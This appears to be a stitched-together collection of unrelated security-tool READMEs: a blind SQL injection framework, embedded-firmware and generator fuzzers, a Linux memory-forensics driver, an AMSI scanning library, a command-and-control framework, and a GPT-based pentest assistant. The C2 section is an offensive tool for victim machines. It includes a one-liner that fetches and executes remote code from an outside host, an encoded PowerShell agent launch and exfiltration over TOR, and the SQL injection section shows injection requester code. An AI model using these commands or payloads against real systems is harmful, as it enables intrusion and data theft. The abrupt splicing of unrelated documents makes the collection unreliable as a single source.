Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023
More information can be found in our paper and slides.
To install Hakuin, simply run:
pip3 install hakuin
Developers should install the package locally and set the -e
flag for editable mode:
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester
and override the request
method. Also, the method must determine whether the query resolved to True
or False
.
import aiohttp
from hakuin import Requester
class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()
To start extracting data, use the Extractor
class. It requires a DBMS
object to contruct queries and a Requester
object to inject them. Hakuin currently supports SQLite
, MySQL
, PSQL
(PostgreSQL), and MSSQL
(SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS
interface defined in hakuin/dbms/DBMS.py
.
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL
class StatusRequester(Requester):
...
async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())
Now that eveything is set, you can start extracting DB metadata.
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')
metadata = await ext.extract_meta(strategy='model')
Once you know the structure, you can extract the actual content.
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
res = await ext.extract_column_int(table='users', column='id')
res = await ext.extract_column_float(table='products', column='price')
res = await ext.extract_column_blob(table='users', column='id')
More examples can be found in the tests
directory.
Hakuin comes with a simple wrapper tool, hk.py
, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
python3 hk.py -h
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
This is the companion code for the paper: 'Fuzzing Embedded Systems using Debugger Interfaces'. A preprint of the paper can be found here https://publications.cispa.saarland/3950/. The code allows the users to reproduce and extend the results reported in the paper. Please cite the above paper when reporting, reproducing or extending the results.
.
βββ benchmark # Scripts to build Google's fuzzer test suite and run experiments
βββ dependencies # Contains a Makefile to install dependencies for GDBFuzz
βββ evaluation # Raw exeriment data, presented in the paper
βββ example_firmware # Embedded example applications, used for the evaluation
βββ example_programs # Contains a compiled example program and configs to test GDBFuzz
βββ src # Contains the implementation of GDBFuzz
βββ Dockerfile # For creating a Docker image with all GDBFuzz dependencies installed
βββ LICENSE # License
βββ Makefile # Makefile for creating the docker image or install GDBFuzz locally
βββ README.md # This README file
The idea of GDBFuzz is to leverage hardware breakpoints from microcontrollers as feedback for coverage-guided fuzzing. Therefore, GDB is used as a generic interface to enable broad applicability. For binary analysis of the firmware, Ghidra is used. The code contains a benchmark setup for evaluating the method. Additionally, example firmware files are included.
GDBFuzz enables coverage-guided fuzzing for embedded systems, but - for evaluation purposes - can also fuzz arbitrary user applications. For fuzzing on microcontrollers we recommend a local installation of GDBFuzz to be able to send fuzz data to the device under test flawlessly.
GDBFuzz has been tested on Ubuntu 20.04 LTS and Raspberry Pie OS 32-bit. Prerequisites are java and python3. First, create a new virtual environment and install all dependencies.
virtualenv .venv
source .venv/bin/activate
make
chmod a+x ./src/GDBFuzz/main.py
GDBFuzz reads settings from a config file with the following keys.
[SUT]
# Path to the binary file of the SUT.
# This can, for example, be an .elf file or a .bin file.
binary_file_path = <path>
# Address of the root node of the CFG.
# Breakpoints are placed at nodes of this CFG.
# e.g. 'LLVMFuzzerTestOneInput' or 'main'
entrypoint = <entrypoint>
# Number of inputs that must be executed without a breakpoint hit until
# breakpoints are rotated.
until_rotate_breakpoints = <number>
# Maximum number of breakpoints that can be placed at any given time.
max_breakpoints = <number>
# Blacklist functions that shall be ignored.
# ignore_functions is a space separated list of function names e.g. 'malloc free'.
ignore_functions = <space separated list>
# One of {Hardware, QEMU, SUTRunsOnHost}
# Hardware: An external component starts a gdb server and GDBFuzz can connect to this gdb server.
# QEMU: GDBFuzz starts QEMU. QEMU emulates binary_file_path and starts gdbserver.
# SUTRunsOnHost: GDBFuzz start the target program within GDB.
target_mode = <mode>
# Set this to False if you want to start ghidra, analyze the SUT,
# and start the ghidra bridge server manually.
start_ghidra = True
# Space separated list of addresses where software breakpoints (for error
# handling code) are set. Execution of those is considered a crash.
# Example: software_breakpoint_addresses = 0x123 0x432
software_breakpoint_addresses =
# Whether all triggered software breakpoints are considered as crash
consider_sw_breakpoint_as_error = False
[SUTConnection]
# The class 'SUT_connection_class' in file 'SUT_connection_path' implements
# how inputs are sent to the SUT.
# Inputs can, for example, be sent over Wi-Fi, Serial, Bluetooth, ...
# This class must inherit from ./connections/SUTConnection.py.
# See ./connections/SUTConnection.py for more information.
SUT_connection_file = FIFOConnection.py
[GDB]
path_to_gdb = gdb-multiarch
#Written in address:port
gdb_server_address = localhost:4242
[Fuzzer]
# In Bytes
maximum_input_length = 100000
# In seconds
single_run_timeout = 20
# In seconds
total_runtime = 3600
# Optional
# Path to a directory where each file contains one seed. If you don't want to
# use seeds, leave the value empty.
seeds_directory =
[BreakpointStrategy]
# Strategies to choose basic blocks are located in
# 'src/GDBFuzz/breakpoint_strategies/'
# For the paper we use the following strategies
# 'RandomBasicBlockStrategy.py' - Randomly choosing unreached basic blocks
# 'RandomBasicBlockNoDomStrategy.py' - Like previous, but doesn't use dominance relations to derive transitively reached nodes.
# 'RandomBasicBlockNoCorpusStrategy.py' - Like first, but prevents growing the input corpus and therefore behaves like blackbox fuzzing with coverage measurement.
# 'BlackboxStrategy.py', - Doesn't set any breakpoints
breakpoint_strategy_file = RandomBasicBlockStrategy.py
[Dependencies]
path_to_qemu = dependencies/qemu/build/x86_64-linux-user/qemu-x86_64
path_to_ghidra = dependencies/ghidra
[LogsAndVisualizations]
# One of {DEBUG, INFO, WARNING, ERROR, CRITICAL}
loglevel = INFO
# Path to a directory where output files (e.g. graphs, logfiles) are stored.
output_directory = ./output
# If set to True, an MQTT client sends UI elements (e.g. graphs)
enable_UI = False
An example config file is located in ./example_programs/
together with an example program that was compiled using our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common/
. Start fuzzing for one hour with the following command.
chmod a+x ./example_programs/json-2017-02-12
./src/GDBFuzz/main.py --config ./example_programs/fuzz_json.cfg
We first see output from Ghidra analyzing the binary executable and susequently messages when breakpoints are relocated or hit.
Depending on the specified output_directory
in the config file, there should now be a folder trial-0
with the following structure
.
βββ corpus # A folder that contains the input corpus.
βββ crashes # A folder that contains crashing inputs - if any.
βββ cfg # The control flow graph as adjacency list.
βββ fuzzer_stats # Statistics of the fuzzing campaign.
βββ plot_data # Table showing at which relative time in the fuzzing campaign which basic block was reached.
βββ reverse_cfg # The reverse control flow graph.
By setting start_ghidra = False
in the config file, GDBFuzz connects to a Ghidra instance running in GUI mode. Therefore, the ghidra_bridge plugin needs to be started manually from the script manager. During fuzzing, reached program blocks are highlighted in green.
For fuzzing on Linux user applications, GDBFuzz leverages the standard LLVMFuzzOneInput
entrypoint that is used by almost all fuzzers like AFL, AFL++, libFuzzer,.... In benchmark/benchSUTs/GDBFuzz_wrapper/common
There is a wrapper that can be used to compile any compliant fuzz harness into a standalone program that fetches input via a named pipe at /tmp/fromGDBFuzz
. This allows to simulate an embedded device that consumes data via a well defined input interface and therefore run GDBFuzz on any application. For convenience we created a script in benchmark/benchSUTs
that compiles all programs from our evaluation with our wrapper as explained later.
NOTE: GDBFuzz is not intended to fuzz Linux user applications. Use AFL++ or other fuzzers therefore. The wrapper just exists for evaluation purposes to enable running benchmarks and comparisons on a scale!
The general effectiveness of our approach is shown in a large scale benchmark deployed as docker containers.
make dockerimage
To run the above experiment in the docker container (for one hour as specified in the config file), map the example_programs
and output
folder as volumes and start GDBFuzz as follows.
chmod a+x ./example_programs/json-2017-02-12
docker run -it --env CONFIG_FILE=/example_programs/fuzz_json_docker_qemu.cfg -v $(pwd)/example_programs:/example_programs -v $(pwd)/output:/output gdbfuzz:1.0
An output folder should appear in the current working directory with the structure explained above.
Our evaluation is split in two parts. 1. GDBFuzz on its intended setup, directly on the hardware. 2. GDBFuzz in an emulated environment to allow independend analysis and comparisons of the results.
GDBFuzz can work with any GDB server and therefore most debug probes for microcontrollers.
Regarding RQ1 from the paper, we execute GDBFuzz on different microcontrollers with different firmwares located in example_firmware
. For each experiment we run GDBFuzz with the RandomBasicBlock
and with the RandomBasicBlockNoCorpus
strategy. The latter behaves like fuzzing without feedback, but we can still measure the achieved coverage. For answering RQ1, we compare the achieved coverage of the RandomBasicBlock
and the RandomBasicBlockNoCorpus
strategy. Respective config files are in the corresponding subfolders and we now explain how to setup fuzzing on the four development boards.
GDBFuzz requires access to a GDB Server. In this case the B-L4S5I-IOT01A and its on-board debugger are used. This on-board debugger sets up a GDB server via the 'st-util' program, and enables access to this GDB server via localhost:4242.
sudo apt-get install stlink-tools gdb-multiarch
Build and flash a firmware for the STM32 B-L4S5I-IOT01A, for example the arduinojson project.
Prerequisite: Install platformio (pio)
cd ./example_firmware/stm32_disco_arduinojson/
pio run --target upload
For your info: platformio stored an .elf file of the SUT here: ./example_firmware/stm32_disco_arduinojson/.pio/build/disco_l4s5i_iot01a/firmware.elf
This .elf file is also later used in the user configuration for Ghidra.
Start a new terminal, and run the following to start the a GDB Server:
st-util
Run GDBFuzz with a user configuration for arduinojson. We can send data over the usb port to the microcontroller. The microcontroller forwards this data via serial to the SUT'. In our case /dev/ttyACM0
is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyACM0
in the config file to your device.
./src/GDBFuzz/main.py --config ./example_firmware/stm32_disco_arduinojson/fuzz_serial_json.cfg
Fuzzer statistics and logs are in the ./output/... directory.
Install pyocd
:
pip install --upgrade pip 'mbed-ls>=1.7.1' 'pyocd>=0.16'
Make sure that 'KitProg v3' is on the device and put Board into 'Arm DAPLink' Mode by pressing the appropriate button. Start the GDB server:
pyocd gdbserver --persist
Flash a firmware and start fuzzing e.g. with
gdb-multiarch
target remote :3333
load ./example_firmware/CY8CKIT_json/mtb-example-psoc6-uart-transmit-receive.elf
monitor reset
./src/GDBFuzz/main.py --config ./example_firmware/CY8CKIT_json/fuzz_serial_json.cfg
Build and flash a firmware for the ESP32, for instance the arduinojson example with platformio.
cd ./example_firmware/esp32_arduinojson/
pio run --target upload
Add following line to the openocd config file for the J-Link debugger: jlink.cfg
adapter speed 10000
Start a new terminal, and run the following to start the GDB Server:
get_idf
openocd -f interface/jlink.cfg -f target/esp32.cfg -c "telnet_port 7777" -c "gdb_port 8888"
Run GDBFuzz with a user configuration for arduinojson. We can send data over the usb port to the microcontroller. The microcontroller forwards this data via serial to the SUT'. In our case /dev/ttyUSB0
is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyUSB0
in the config file to your device.
./src/GDBFuzz/main.py --config ./example_firmware/esp32_arduinojson/fuzz_serial.cfg
Fuzzer statistics and logs are in the ./output/... directory.
Install TI MSP430 GCC from https://www.ti.com/tool/MSP430-GCC-OPENSOURCE
Start GDB Server
./gdb_agent_console libmsp430.so
or (more stable). Build mspdebug from https://github.com/dlbeer/mspdebug/ and use:
until mspdebug --fet-skip-close --force-reset tilib "opt gdb_loop True" gdb ; do sleep 1 ; done
Ghidra fails to analyze binaries for the TI MSP430 controller out of the box. To fix that, we import the file in the Ghidra GUI, choose MSP430X as architecture and skip the auto analysis. Next, we open the 'Symbol Table', sort them by name and delete all symbols with names like $C$L*
. Now the auto analysis can be executed. After analysis, start the ghidra bridge from the Ghidra GUI manually and then start GDBFuzz.
./src/GDBFuzz/main.py --config ./example_firmware/msp430_arduinojson/fuzz_serial.cfg
To access USB devices as non-root user with pyusb
we add appropriate rules to udev. Paste following lines to /etc/udev/rules.d/50-myusb.rules
:
SUBSYSTEM=="usb", ATTRS{idVendor}=="1234", ATTRS{idProduct}=="5678" GROUP="usbusers", MODE="666"
Reload udev:
sudo udevadm control --reload
sudo udevadm trigger
In RQ2 from the paper, we compare GDBFuzz against the emulation based approach Fuzzware. First we execute GDBFuzz and Fuzzware as described previously on the shipped firmware files. For each GDBFuzz experiment, we create a file with valid basic blocks from the control flow graph files as follows:
cut -d " " -f1 ./cfg > valid_bbs.txt
Now we can replay coverage against fuzzware result fuzzware genstats --valid-bb-file valid_bbs.txt
When crashing or hanging inputs are found, the are stored in the crashes
folder. During evaluation, we found the following three bugs:
GDBFuzz can also run on a Raspberry Pi host with slight modifications:
In file ./dependencies/ghidra/support/launch.sh:125
The JAVA_HOME
variable must be hardcoded therefore e.g. to JAVA_HOME="/usr/lib/jvm/default-java"
To fuzz software on other boards, GDBFuzz requires
src/GDBFuzz/connections
) that triggers execution of the code at the entry point e.g. serial connectionAll these properties need to be specified in the config file.
For RQ's 4 - 8 we run a large scale benchmark. First, build the Docker image as described previously and compile applications from Google's Fuzzer Test Suite with our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common
.
cd ./benchmark/benchSUTs
chmod a+x setup_benchmark_SUTs.py
make dockerbenchmarkimage
Next adopt the benchmark settings in benchmark/scripts/benchmark.py
and benchmark/scripts/benchmark_aflpp.py
to your demands (especially number_of_cores
, trials
, and seconds_per_trial
) and start the benchmark with:
cd ./benchmark/scripts
./benchmark.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
./benchmark_aflpp.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
A folder appears in ./benchmark/scripts
that contains plot files (coverage over time), fuzzer statistic files, and control flow graph files for each experiment as in evaluation/fuzzer_test_suite_qemu_runs
.
GDBFuzz has an optional feature where it plots the control flow graph of covered nodes. This is disabled by default. You can enable it by following the instructions of this section and setting 'enable_UI' to 'True' in the user configuration.
On the host:
Install
sudo apt-get install graphviz
Install a recent version of node, for example Option 2 from here. Use Option 2 and not option 1. This should install both node and npm. For reference, our version numbers are (but newer versions should work too):
β node --version
v16.9.1
β npm --version
7.21.1
Install web UI dependencies:
cd ./src/webui
npm install
Install mosquitto MQTT broker, e.g. see here
Update the mosquitto broker config: Replace the file /etc/mosquitto/conf.d/mosquitto.conf with the following content:
listener 1883
allow_anonymous true
listener 9001
protocol websockets
Restart the mosquitto broker:
sudo service mosquitto restart
Check that the mosquitto broker is running:
sudo service mosquitto status
The output should include the text 'Active: active (running)'
Start the web UI:
cd ./src/webui
npm start
Your web browser should open automatically on 'http://localhost:3000/'.
Start GDBFuzz and use a user config file where enable_UI is set to True. You can use the Docker container and arduinojson SUT from above. But make sure to set 'enable_UI' to 'True'.
The nodes covered in 'blue' are covered. White nodes are not covered. We only show uncovered nodes if their parent is covered (drawing the complete control flow graph takes too much time if the control flow graph is large).
Like its Windows counterpart, Winpmem, this is not a traditional memory dumper. Linpmem offers an API for reading from any physical address, including reserved memory and memory holes, but it can also be used for normal memory dumping. Furthermore, the driver offers a variety of access modes to read physical memory, such as byte, word, dword, qword, and buffer access mode, where buffer access mode is appropriate in most standard cases. If reading requires an aligned byte/word/dword/qword read, Linpmem will do precisely that.
Currently, the Linpmem features:
Cache Control is to be added in future for support of the specialized read access modes.
At least for now, you must compile the Linpmem driver yourself. A method to load a precompiled Linpmem driver on other Linux systems is currently under work, but not finished yet. That said, compiling the Linpmem driver is not difficult, basically it's executing 'make'.
You need make
and a C compiler. (We recommend gcc, but clang should work as well).
Make sure that you have the linux-headers
installed (using whatever package manager your target linux distro has). The exact package name may vary on your distribution. A quick (distro-independent) way to check if you have the package installed:
ls -l /usr/lib/modules/`uname -r`/
That's it, you can proceed to step 2.
Foreign system: Currently, if you want to compile the driver for another system, e.g., because you want to create a memory dump but can't compile on the target, you have to download the header package directly from the package repositories of that system's Linux distribution. Double-check that the package version exactly matches the release and kernel version running on the foreign system. In case the other system is using a self-compiled kernel you have to obtain a copy of that kernel's build directory. Then, place the location of either directory in the KDIR
environment variable.
export KDIR=path/to/extracted/header/package/or/kernel/root
Compiling the driver is simple, just type:
make
This should produce linpmem.ko
in the current working directory.
You might want to check precompiler.h
before and chose whether to compile for release or debug (e.g., with debug printing). There aren't much other precompiler settings right now.
The linpmem.ko module can be loaded by using insmod path-to-linpmem.ko
, and unloaded with rmmod path-to-linpmem.ko
. (This will load the driver only for this uptime.) If you compiled for debug, also take a look at dmesg.
After loading, for talking to the driver, you need to create the device:
mknod /dev/linpmem c 42 0
If you can't talk to the driver, potentially check in dmesg log to verify that '42' was indeed the registered major:
[12827.900168] linpmem: registered chrdev with major 42
Though usually the kernel would try to really assign this number.
You can use chown
on the device to give it to your user, if you do not want to have a root console open all the time. (Or just keep using it in a root console.)
There is an example code demonstrating and explaining (in detail) how to interact with the driver. The user-space API reference can furthermore be found in ./userspace_interface/linpmem_shared.h
.
This code is important, if you want to understand how to directly interact with the driver instead of using a library. It can also be used as a short function test.
There is an (optional) basic command line interface tool to Linpmem, the pmem CLI tool. It can be found here: https://github.com/vobst/linpmem-cli. Aside from the source code, there is also a precompiled CLI tool as well as the precompiled static library and headers that can be found here (signed). Note: this is a preliminary version, be sure to check for updates, as many additions and enhancements will follow soon.
The pmem CLI tool can be used for testing the various functions of Linpmem in a (relatively) safe and convenient manner. Linpmem can also be loaded by this tool instead of using insmod/rmmod, with some extra options in future. This also has the advantage that pmem auto-creates the right device for you for immediate use. It is extremely portable and runs on any Linux system (and, in fact, has been tested even on a Linux 2.6).
$ ./pmem -h
Command-line client for the linpmem driver
Usage: pmem [OPTIONS] [COMMAND]
Commands:
insmod Load the linpmem driver
help Print this message or the help of the given subcommand(s)
Options:
-a, --address <ADDRESS> Address for physical read operations
-v, --virt-address <VIRT_ADDRESS> Translate address in target process' address space (default: current process)
-s, --size <SIZE> Size of buffer read operations
-m, --mode <MODE> Access mode for read operations [possible values: byte, word, dword, qword, buffer]
-p, --pid <PID> Target process for cr3 info and virtual-to-physical translations
--cr3 Query cr3 value of target process (default: current process)
--verbose Display debug output
-h, --help Print help (see more with '--help')
-V, --version Print version
If you want to compile the cli tool yourself, change to its directory and follow the instructions in the (cli) Readme to build it. Otherwise, just download the prebuilt program, it should work on any Linux. To load the kernel driver with the cli tool:
# pmem insmod path/to/linpmem.ko
The advantage of using the pmem tool to load the driver is that you do not have to create the device file yourself, and it will offer (on next releases) to choose who owns the linpmem device.
The pmem command line interface is only a thin wrapper around a small Rust library that exposes an API for interfacing with the driver. More advanced users can also use this library. The library is automatically compiled (as static portable library) along with the pmem cli tool when compiling from https://github.com/vobst/linpmem-cli, but also included (precompiled) here (signed). Note: this is a preliminary version, more to follow soon.
If you do not want to use the usermode library and prefer to interface with the driver directly on your own, you can find its user-space API/interface and documentation in ./userspace_interface/linpmem_shared.h
. We also provide example code in demo/test.c
that explains how to use the driver directly.
Not implemented yet.
If the system reports the following error message when loading the module, it might be because of secure boot:
$ sudo insmod linpmem.ko
insmod: ERROR: could not insert module linpmem.ko: Operation not permitted
There are different ways to still load the module. The obvious one is to disable secure boot in your UEFI settings.
If your distribution supports it, a more elegant solution would be to sign the module before using it. This can be done using the following steps (tested on Ubuntu 20.04).
$ sudo apt install mokutil
$ openssl req -new -newkey rsa:4096 -keyout mok-signing.key -out mok-signing.crt -outform DER -days 365 -nodes -subj "/CN=Some descriptive name/"
$ sudo mokutil --import mok-signing.crt
$ /usr/src/linux-headers-$(uname -r)/scripts/sign-file sha256 path/to/mok-singing/MOK.key path/to//MOK.cert path/to/linpmem.ko
After that, you should be able to load the module.
Note that from a forensic-readiness perspective, you should prepare a signed module before you need it, as the system will reboot twice during the process described above, destroying most of your volatile data in memory.
(Please report potential issues if you encounter anything.)
Linpmem, as well as Winpmem, would not exist without the work of our predecessors of the (now retired) REKALL project: https://github.com/google/rekall.
Our open source contributors:
py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.
Via pip
pip install pyamsi
Clone repository
git clone https://github.com/Tomiwa-Ot/py-amsi.git
cd py-amsi/
python setup.py install
from pyamsi import Amsi
# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default
# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default
# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
Risk Level | Meaning |
---|---|
0 | AMSI_RESULT_CLEAN (File is clean) |
1 | AMSI_RESULT_NOT_DETECTED (No threat detected) |
16384 | AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator) |
20479 | AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator) |
32768 | AMSI_RESULT_DETECTED (File is considered malware) |
https://tomiwa-ot.github.io/py-amsi/index.html
MaccaroniC2 is a proof-of-concept Command and Control framework that utilizes the powerful AsyncSSH
Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok
wrapper for ngrok
integration. This tool is inspired for a specific scenario where the victim runs the AsyncSSH server and establishes a tunnel to the outside, ready to receive commands by the attacker.
The attacker leverages the Ngrok official API
to retrieve the hostname and port of the tunnel to establish a connection. This approach takes advantage of the comprehensive capabilities provided by AsyncSSH, including its integrated support for SFTP
and SCP
, facilitating secure and efficient data exfiltration and more.
Moreover, the attacker can send and execute system commands using a SOCKS proxy, leveraging the benefits offered, for example, using TOR
to enhance anonymity.
Run python3 gen_rsa.py
to generate a pair of SSH keys. The newly generated id_rsa
is used by the attacker to connect to the server running on the victim's machine.
Edit the asyncssh_server.py
file and place the contents of the newly generated id_rsa.pub
inside the pub_key
variable. The asyncssh_server.py
provide an implementation of the SSHv2 protocol with SFTP and SCP features. This is the script run by the victim.
Create a free account on Ngrok site and take note of the AUTH
Token.
Add the AUTH
token to the token
variable in asyncssh_server.py
, this needs to be harcoded inside the ngrok_tunnel()
function.
Create a free API
key on the Ngrok website. Take note of the generated string.
Put the API
key string in the api_key
variable inside the async_commander.py
file. This allows us to automatically retrieve the Ngrok domain and port of the active tunnel during automation.
Perform the same step for get_endpoints.py
file. This script retrieves various useful information about active tunnels.
With async_commander.py
you can send any command to the server. It automatically requests the Ngrok tunnel's domain and port activated by the victim using Ngrok official API.
Please note also that the id_rsa
needs to be in the same folder of async_commander.py
Run server on victim machine:
python3 asyncssh_server.py
From the attacker machine send command using socks proxy:
python3 asyncssh_commander.py "ls -la" --proxy socks5://127.0.0.1:9050
Send command without using a proxy:
python3 asyncssh_commander.py "whoami"
Spawn another C2 agent (Powershell-Empire, Meterpreter, etc):
python3 asyncssh_commander.py "powershell.exe -e ABJe...dhYte"
Meterpreter web_delivery module
python3 asyncssh_commander.py "python3 -c \"import sys; import ssl; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]], fromlist=('urlopen',)); r=u.urlopen('http://100.100.100.100:8080/YnrVekAsVF', context=ssl._create_unverified_context()); exec(r.read());\""
Get list of active tunnels:
python3 get_endpoints.py
Generate new RSA key pairs:
python3 gen_rsa.py
Using SFTP
and SCP
- you don't need a valid username just the correct id_rsa
proxychains sftp -P NGROK_PORT -i id_rsa ddddd@NGROK_HOST
scp -i id_rsa -o ProxyCommand="nc -x localhost:9050 %h NGROK_PORT" source_file ddddd@NGROK_HOST:destination_path
sftp -P PORT -i id_rsa ddddd@NGROK_HOST
scp -i id_rsa -P PORT source_file ddddd@NGROK_HOST:destination_path
python -m pip install nuitka
python -m nuitka --standalone --onefile asyncssh_server.py
https://github.com/hacktivesec/MaccaroniC2/blob/main/weaponized_server.py
For furter information check the related article: https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/
DISCLAIMER: This tool is intended for testing and educational purposes only. It should only be used on systems with proper authorization. Any unauthorized or illegal use of this tool is strictly prohibited. The creator of this tool holds no responsibility for any misuse or damage caused by its usage. Please ensure compliance with applicable laws and regulations while utilizing this tool. Additionally, itβs important to note that the usage of Ngrok in conjunction with this tool may result in the violation of the terms of service or policies of certain platforms. It is advisable to review and comply with the terms of use of any platform or service to avoid potential account bans or disruptions.
A GPT-empowered penetration testing tool.
resources
where we use it to solve HackTheBox challenge TEMPLATED (web challenge).Before installation, we recommend you to take a look at this installation video if you want to use cookie setup.
requirements.txt
with pip install -r requirements.txt
config
. You may follow a sample by cp config/chatgpt_config_sample.py config/chatgpt_config.py
. Inspect - Network
, find the connections to the ChatGPT session page.https://chat.openai.com/api/auth/session
and paste it into the cookie
field of config/chatgpt_config.py
. (You may use Inspect->Network, find session and copy the cookie
field in request_headers
to https://chat.openai.com/api/auth/session
)userAgent
with your user agent.chatgpt_config.py
.python3 test_connection.py
. You should see some sample conversation with ChatGPT. 1. You're connected with ChatGPT Plus cookie.
To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4>
## Test connection for OpenAI api (GPT-4)
2. You're connected with OpenAI API. You have GPT-4 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4 --useAPI>
## Test connection for OpenAI api (GPT-3.5)
3. You're connected with OpenAI API. You have GPT-3.5 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI>
https://chat.openai.com/backend-api/conversations
. Please submit an issue if you encounter any problem.python3 main.py --args
. --reasoning_model
is the reasoning model you want to use.--useAPI
is whether you want to use OpenAI API.test_connection.py
, which are: python3 main.py --reasoning_model=gpt-4
python3 main.py --reasoning_model=gpt-4 --useAPI
python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI
help
: show the help message.next
: key in the test execution result and get the next step.more
: let PentestGPT to explain more details of the current step. Also, a new sub-task solver will be created to guide the tester.todo
: show the todo list.discuss
: discuss with the PentestGPT.google
: search on Google. This function is still under development.quit
: exit the tool and save the output as log file (see the reporting section below).TAB
to autocomplete the commands.ENTER
to select the item. Similarly, use <SHIFT + right arrow> to confirm selection.more
, users can execute more commands to investigate into a specific problem: help
: show the help message.brainstorm
: let PentestGPT brainstorm on the local task for all the possible solutions.discuss
: discuss with PentestGPT about this local task.google
: search on Google. This function is still under development.continue
: exit the subtask and continue the main testing session.logs
folder (if you quit with quit
command).python3 utils/report_generator.py <log file>
. A sample report sample_pentestGPT_log.txt
is also uploaded.Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!
git checkout -b feature/AmazingFeature
)git commit -m 'Add some AmazingFeature'
)git push origin feature/AmazingFeature
)Distributed under the MIT License. See LICENSE.txt
for more information.
Gelei Deng - gelei.deng@ntu.edu.sg
Fuzztruction is an academic prototype of a fuzzer that does not directly mutate inputs (as most fuzzers do) but instead uses a so-called generator application to produce an input for our fuzzing target. As programs generating data usually produce the correct representation, our fuzzer mutates the generator program (by injecting faults), such that the data produced is almost valid. Optimally, the produced data passes the parsing stages in our fuzzing target, called consumer, but triggers unexpected behavior in deeper program logic. This allows to even fuzz targets that utilize cryptography primitives such as encryption or message integrity codes. The main advantage of our approach is that it generates complex data without requiring heavyweight program analysis techniques, grammar approximations, or human intervention.
For instructions on how to reproduce the experiments from the paper, please read the fuzztruction-experiments
submodule documentation after reading this document.
Compatibility: While we try to make sure that our prototype is as platform independent as possible, we are not able to test it on all platforms. Thus, if you run into issues, please use Ubuntu 22.04.1, which was used during development as the host system.
Β
# Clone the repository
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git
# Option 1: Get a pre-built version of our runtime environment.
# To ease reproduction of experiments in our paper, we recommend using our
# pre-built environment to avoid incompatibilities (~30 GB of data will be
# donwloaded)
# Do NOT use this if you don't want to reproduce our results but instead fuzz
# own targets (use the next command instead).
./env/pull-prebuilt.sh
# Option 2: Build the runtime environment for Fuzztruction from scratch.
# Do NOT run this if you executed pull-prebuilt.sh
./env/build.sh
# Spawn a container based on the image built/pulled before.
# To spawn a container using the prebuilt image (if pulled above),
# you need to set USE_PREBUILT to 1, e.g., `USE_PREBUILT=1 ./env/start.sh`
./env /start.sh
# Calling this script again will spawn a shell inside the container.
# (can be called multiple times to spawn multiple shells within the same
# container).
./env/start.sh
# Runninge start.sh the second time will automatically build the fuzzer.
